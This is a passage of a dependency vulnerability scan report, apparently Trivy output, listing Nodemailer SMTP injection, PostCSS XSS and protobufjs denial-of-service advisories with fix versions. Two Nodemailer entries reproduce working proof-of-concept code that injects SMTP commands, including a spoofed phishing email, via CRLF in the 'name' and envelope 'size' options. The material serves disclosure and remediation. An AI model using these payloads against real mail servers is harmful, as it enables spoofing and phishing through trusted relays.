V3Score: 7.5 References: - https://access.redhat.com/errata/RHSA-2026:15979 - https://access.redhat.com/errata/RHSA-2026:3751 - https://access.redhat.com/security/cve/CVE-2025-13033 - https://bugzilla.redhat.com/show_bug.cgi?id=2402179 - https://github.com/nodemailer/nodemailer - https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626 - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87 - https://nvd.nist.gov/vuln/detail/CVE-2025-13033 - https://www.cve.org/CVERecord?id=CVE-2025-13033 PublishedDate: '2025-11-14T20:15:45.957Z' LastModifiedDate: '2026-05-11T13:16:10.037Z' context: sbom: name: nodemailer version: 6.10.1 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.349866666666665 epss: 0.00031 epss_percentile: 0.0896 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00124 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 314c4b93bbc126bb ruleId: GHSA-vvjj-xcjg-gr5g severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ' title: GHSA-vvjj-xcjg-gr5g description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable\ \ to SMTP command injection via CRLF sequences in the transport `name` configuration\ \ option. The `name` value is used directly in the EHLO/HELO SMTP command without\ \ any sanitization for carriage return and line feed characters (`\\r\\n`). An\ \ attacker who can influence this option can inject arbitrary SMTP commands, enabling\ \ unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\ \nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing\ \ an SMTP connection, the `name` option is concatenated directly into the EHLO\ \ command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name\ \ = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO\ \ ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly\ \ to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str\ \ + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences,\ \ each injected line is interpreted by the SMTP server as a separate command.\ \ Unlike the `envelope.from` and `envelope.to` fields which are validated for\ \ `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed\ \ (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives\ \ no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported\ \ GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter\ \ (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM\ \ command), and occurs at connection initialization rather than during message\ \ sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line\ \ 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\n\ const nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple\ \ SMTP server to observe injected commands\nconst server = net.createServer(socket\ \ => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data\ \ => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n\ \ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\ \ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \ \ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\ \ FROM'))\n socket.write('250 OK\\r\\n');\n else if\ \ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\ \ else if (line === 'DATA')\n socket.write('354 Go\\\ r\\n');\n else if (line === '.')\n socket.write('250\ \ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\ \ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \ \ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\ \ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\ \ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\ \ host: '127.0.0.1',\n port: port,\n secure: false,\n \ \ name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n \ \ + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\\ r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing\ \ content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from:\ \ 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject:\ \ 'Normal email',\n text: 'Normal content'\n }, () => { server.close();\ \ process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives\ \ the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate\ \ SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is\ \ affected:** Applications that allow users or external input to configure the\ \ `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms\ \ with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name\ \ settings are stored in databases\n- Applications loading SMTP config from environment\ \ variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized\ \ emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n\ 2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n\ 3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n\ 4. **Bypass application-level controls** on email recipients, since the injected\ \ commands are processed before the application's intended MAIL FROM/RCPT TO\n\ 5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\n\ The injection occurs at the EHLO stage (before authentication in most SMTP flows),\ \ making it particularly dangerous as the injected commands may be processed with\ \ the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option\ \ by stripping or rejecting CRLF sequences, similar to how `envelope.from` and\ \ `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`.\ \ For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\ r\\n]/g, '');\n```" remediation: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g references: [] tags: - vulnerability - pkg:nodemailer@6.10.1 raw: VulnerabilityID: GHSA-vvjj-xcjg-gr5g PkgID: nodemailer@6.10.1 PkgName: nodemailer PkgIdentifier: PURL: pkg:npm/nodemailer@6.10.1 UID: c243d03ecfce3c20 InstalledVersion: 6.10.1 FixedVersion: 8.0.5 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77 Title: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport name Option (EHLO/HELO) ' Description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are\ \ vulnerable to SMTP command injection via CRLF sequences in the transport `name`\ \ configuration option. The `name` value is used directly in the EHLO/HELO SMTP\ \ command without any sanitization for carriage return and line feed characters\ \ (`\\r\\n`). An attacker who can influence this option can inject arbitrary\ \ SMTP commands, enabling unauthorized email sending, email spoofing, and phishing\ \ attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`.\ \ When establishing an SMTP connection, the `name` option is concatenated directly\ \ into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js,\ \ line 71\nthis.name = this.options.name || this._getHostname();\n\n// line\ \ 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method\ \ writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\ \n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n\ ```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line\ \ is interpreted by the SMTP server as a separate command. Unlike the `envelope.from`\ \ and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119),\ \ and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8)\ \ by casting to a number, the `name` parameter receives no CRLF sanitization\ \ whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8\ \ (envelope.size injection) as it affects a different parameter (`name` vs `size`),\ \ uses a different injection point (EHLO command vs MAIL FROM command), and\ \ occurs at connection initialization rather than during message sending.\n\n\ The `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands\ \ with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer\ \ = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server\ \ to observe injected commands\nconst server = net.createServer(socket => {\n\ \ socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n\ \ const lines = data.toString().split('\\r\\n').filter(l => l);\n \ \ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\ \ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \ \ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\ \ FROM'))\n socket.write('250 OK\\r\\n');\n else if\ \ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\ \ else if (line === 'DATA')\n socket.write('354 Go\\\ r\\n');\n else if (line === '.')\n socket.write('250\ \ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\ \ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \ \ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\ \ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\ \ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\ \ host: '127.0.0.1',\n port: port,\n secure: false,\n \ \ name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n \ \ + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From:\ \ ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject:\ \ Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n\ \ from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n\ \ subject: 'Normal email',\n text: 'Normal content'\n }, ()\ \ => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows\ \ the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing\ \ email content as separate SMTP commands before the legitimate email is sent.\n\ \n### Impact\n\n**Who is affected:** Applications that allow users or external\ \ input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant\ \ SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP\ \ hostname/name settings are stored in databases\n- Applications loading SMTP\ \ config from environment variables or external sources\n\n**What can an attacker\ \ do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting\ \ MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary\ \ From headers in the DATA portion\n3. **Conduct phishing attacks** using the\ \ legitimate SMTP server as a relay\n4. **Bypass application-level controls**\ \ on email recipients, since the injected commands are processed before the\ \ application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance**\ \ by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO\ \ stage (before authentication in most SMTP flows), making it particularly dangerous\ \ as the injected commands may be processed with the server's trust context.\n\ \n**Recommended fix:** Sanitize the `name` option by stripping or rejecting\ \ CRLF sequences, similar to how `envelope.from` and `envelope.to` are already\ \ validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\ \n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\ r\\n]/g, '');\n```" Severity: MEDIUM VendorSeverity: ghsa: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N V3Score: 4.9 References: - https://github.com/nodemailer/nodemailer - https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e - https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5 - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g PublishedDate: '2026-04-08T15:05:20Z' LastModifiedDate: '2026-04-08T15:05:20Z' context: sbom: name: nodemailer version: 6.10.1 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 17548d349adde40e ruleId: GHSA-c7w3-x93f-qmm8 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter title: GHSA-c7w3-x93f-qmm8 description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\ \ with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated\ \ directly into the SMTP `MAIL FROM` command without sanitization. This allows\ \ injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding\ \ attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js`\ \ (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL\ \ FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size\ \ && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n\ }\n```\n\nThis contrasts with other envelope parameters in the same function that\ \ ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\\ r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`):\ \ encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches\ \ this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js`\ \ (lines 854-858), which copies all non-standard envelope properties verbatim:\n\ \n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key\ \ => {\n if (!standardFields.includes(key)) {\n this._envelope[key]\ \ = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command\ \ string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value\ \ terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by\ \ default, Nodemailer constructs the envelope automatically from the message's\ \ `from`/`to` fields and does not include `size`. This vulnerability requires\ \ the application to explicitly pass a custom `envelope` object with a `size`\ \ property to `sendMail()`. \nWhile this limits the attack surface, applications\ \ that expose envelope configuration to users are affected.\n\n### PoC\nave the\ \ following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net\ \ = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP\ \ server that logs raw commands\nconst server = net.createServer(socket => {\n\ \ socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data',\ \ chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\\ r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\ \ if (!line) continue;\n console.log('C:', line);\n \ \ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\ r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\ \ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\ \ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\\ n');\n } else if (line === 'DATA') {\n socket.write('354\ \ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\ \ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \ \ socket.write('221 Bye\\r\\n');\n socket.end();\n \ \ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n \ \ const port = server.address().port;\n console.log('SMTP server on port',\ \ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n \ \ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\ \ port,\n secure: false,\n tls: { rejectUnauthorized: false\ \ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\ \ to: 'recipient@example.com',\n subject: 'Normal email',\n \ \ text: 'This is a normal email.',\n envelope: {\n from:\ \ 'sender@example.com',\n to: ['recipient@example.com'],\n \ \ size: '100\\r\\nRCPT TO:',\n },\n }, (err) =>\ \ {\n if (err) console.error('Error:', err.message);\n console.log('\\\ nExpected output above:');\n console.log(' C: MAIL FROM:\ \ SIZE=100');\n console.log(' C: RCPT TO: <--\ \ INJECTED');\n console.log(' C: RCPT TO:');\n\ \ server.close();\n transporter.close();\n });\n});\n```\n\n\ **Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\ \ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\n\ C: RCPT TO:\nC: RCPT TO:\nC: DATA\n\ ...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected\ \ by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\ \n### Impact\nThis is an SMTP command injection vulnerability. An attacker who\ \ can influence the `envelope.size` property in a `sendMail()` call can:\n\n-\ \ **Silently add hidden recipients** to outgoing emails via injected `RCPT TO`\ \ commands, receiving copies of all emails sent through the affected transport\n\ - **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to\ \ send entirely separate emails through the server)\n- **Leverage the sending\ \ organization's SMTP server reputation** for spam or phishing delivery\n\nThe\ \ severity is mitigated by the fact that the `envelope` object must be explicitly\ \ provided by the application. Nodemailer's default envelope construction from\ \ message headers does not include `size`. Applications that pass through user-controlled\ \ data to the envelope options (e.g., via API parameters, admin panels, or template\ \ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\ \ likely all versions where `envelope.size` is supported." remediation: https://github.com/advisories/GHSA-c7w3-x93f-qmm8 references: [] tags: - vulnerability - pkg:nodemailer@6.10.1 raw: VulnerabilityID: GHSA-c7w3-x93f-qmm8 PkgID: nodemailer@6.10.1 PkgName: nodemailer PkgIdentifier: PURL: pkg:npm/nodemailer@6.10.1 UID: c243d03ecfce3c20 InstalledVersion: 6.10.1 FixedVersion: 8.0.4 Status: fixed SeveritySource: ghsa PrimaryURL: https://github.com/advisories/GHSA-c7w3-x93f-qmm8 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e Title: Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter Description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\ \ with a `size` property containing CRLF characters (`\\r\\n`), the value is\ \ concatenated directly into the SMTP `MAIL FROM` command without sanitization.\ \ This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014\ \ silently adding attacker-controlled recipients to outgoing emails.\n\n\n###\ \ Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size`\ \ value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\ \n```javascript\nif (this._envelope.size && this._supportedExtensions.includes('SIZE'))\ \ {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts\ \ with other envelope parameters in the same function that ARE properly sanitized:\n\ - **Addresses** (`from`, `to`): validated for `[\\r\\n<>]` at lines 1107-1127\n\ - **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()`\ \ at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()`\ \ in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard\ \ envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to',\ \ 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key => {\n if (!standardFields.includes(key))\ \ {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince\ \ `_sendCommand()` writes the command string followed by `\\r\\n` to the raw\ \ TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command\ \ and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs\ \ the envelope automatically from the message's `from`/`to` fields and does\ \ not include `size`. This vulnerability requires the application to explicitly\ \ pass a custom `envelope` object with a `size` property to `sendMail()`. \n\ While this limits the attack surface, applications that expose envelope configuration\ \ to users are affected.\n\n### PoC\nave the following as `poc.js` and run with\ \ `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer\ \ = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\n\ const server = net.createServer(socket => {\n socket.write('220 localhost\ \ ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk => {\n \ \ buffer += chunk.toString();\n const lines = buffer.split('\\\ r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\ \ if (!line) continue;\n console.log('C:', line);\n \ \ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\ r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\ \ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\ \ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\\ r\\n');\n } else if (line === 'DATA') {\n socket.write('354\ \ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\ \ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \ \ socket.write('221 Bye\\r\\n');\n socket.end();\n \ \ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n\ \ const port = server.address().port;\n console.log('SMTP server on port',\ \ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n\ \ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\ \ port,\n secure: false,\n tls: { rejectUnauthorized: false\ \ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\ \ to: 'recipient@example.com',\n subject: 'Normal email',\n \ \ text: 'This is a normal email.',\n envelope: {\n from:\ \ 'sender@example.com',\n to: ['recipient@example.com'],\n \ \ size: '100\\r\\nRCPT TO:',\n },\n }, (err)\ \ => {\n if (err) console.error('Error:', err.message);\n console.log('\\\ nExpected output above:');\n console.log(' C: MAIL FROM:\ \ SIZE=100');\n console.log(' C: RCPT TO: \ \ <-- INJECTED');\n console.log(' C: RCPT TO:');\n\ \ server.close();\n transporter.close();\n });\n});\n```\n\n\ **Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\ \ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\n\ C: RCPT TO:\nC: RCPT TO:\nC: DATA\n\ ...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected\ \ by the CRLF in the `size` field, silently adding an extra recipient to the\ \ email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An\ \ attacker who can influence the `envelope.size` property in a `sendMail()`\ \ call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected\ \ `RCPT TO` commands, receiving copies of all emails sent through the affected\ \ transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional\ \ `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage\ \ the sending organization's SMTP server reputation** for spam or phishing delivery\n\ \nThe severity is mitigated by the fact that the `envelope` object must be explicitly\ \ provided by the application. Nodemailer's default envelope construction from\ \ message headers does not include `size`. Applications that pass through user-controlled\ \ data to the envelope options (e.g., via API parameters, admin panels, or template\ \ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\ \ likely all versions where `envelope.size` is supported." Severity: LOW VendorSeverity: ghsa: 1 CVSS: ghsa: V40Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N V40Score: 2.3 References: - https://github.com/nodemailer/nodemailer - https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651 - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8 PublishedDate: '2026-03-26T22:26:46Z' LastModifiedDate: '2026-03-26T22:26:46Z' context: sbom: name: nodemailer version: 6.10.1 path: /package-lock.json compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 6.666666666666666 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 2 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a6ff7b0fa39fdb3f ruleId: CVE-2026-41305 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags' title: CVE-2026-41305 description: PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue. remediation: https://avd.aquasec.com/nvd/cve-2026-41305 references: [] tags: - vulnerability - pkg:postcss@8.4.31 risk: cwe: &id050 - CWE-79 raw: VulnerabilityID: CVE-2026-41305 VendorIDs: - GHSA-qx2v-qp2m-jg93 PkgID: postcss@8.4.31 PkgName: postcss PkgIdentifier: PURL: pkg:npm/postcss@8.4.31 UID: d845910d063cee9a InstalledVersion: 8.4.31 FixedVersion: 8.5.10 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-41305 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6 Title: 'postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags' Description: PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue. Severity: MEDIUM CweIDs: *id050 VendorSeverity: ghsa: 2 redhat: 2 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 redhat: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N V3Score: 6.1 References: - https://access.redhat.com/security/cve/CVE-2026-41305 - https://github.com/postcss/postcss - https://github.com/postcss/postcss/releases/tag/8.5.10 - https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93 - https://nvd.nist.gov/vuln/detail/CVE-2026-41305 - https://www.cve.org/CVERecord?id=CVE-2026-41305 PublishedDate: '2026-04-24T03:16:11.547Z' LastModifiedDate: '2026-04-24T17:16:21.5Z' context: sbom: name: postcss version: 8.4.31 path: /package-lock.json compliance: owaspTop10_2021: - A03:2021 cweTop25_2024: - id: CWE-79 rank: 1 category: Injection cisControlsV8_1: *id010 nistCsf2_0: - *id041 - *id011 - *id012 pciDss4_0: - *id042 - *id013 - *id014 mitreAttack: - *id043 - *id015 priority: priority: 13.349866666666665 epss: 0.00031 epss_percentile: 0.09168 is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.00124 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 62517a0411bc2994 ruleId: CVE-2026-45740 severity: MEDIUM tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion' title: CVE-2026-45740 description: protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0. remediation: https://avd.aquasec.com/nvd/cve-2026-45740 references: [] tags: - vulnerability - pkg:protobufjs@7.5.6 risk: cwe: &id051 - CWE-674 raw: VulnerabilityID: CVE-2026-45740 VendorIDs: - GHSA-jggg-4jg4-v7c6 PkgID: protobufjs@7.5.6 PkgName: protobufjs PkgIdentifier: PURL: pkg:npm/protobufjs@7.5.6 UID: 11481e02f6a2a6cd InstalledVersion: 7.5.6 FixedVersion: 7.5.8, 8.2.0 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-45740 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89 Title: 'protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion' Description: protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0. Severity: MEDIUM CweIDs: *id051 VendorSeverity: ghsa: 2 nvd: 3 CVSS: ghsa: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L V3Score: 5.3 nvd: V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H V3Score: 7.5 References: - https://github.com/protobufjs/protobuf.js - https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6 - https://nvd.nist.gov/vuln/detail/CVE-2026-45740 PublishedDate: '2026-05-13T16:17:00.52Z' LastModifiedDate: '2026-05-13T20:50:15.587Z' context: sbom: name: protobufjs version: 7.5.6 path: /package-lock.json compliance: cisControlsV8_1: *id010 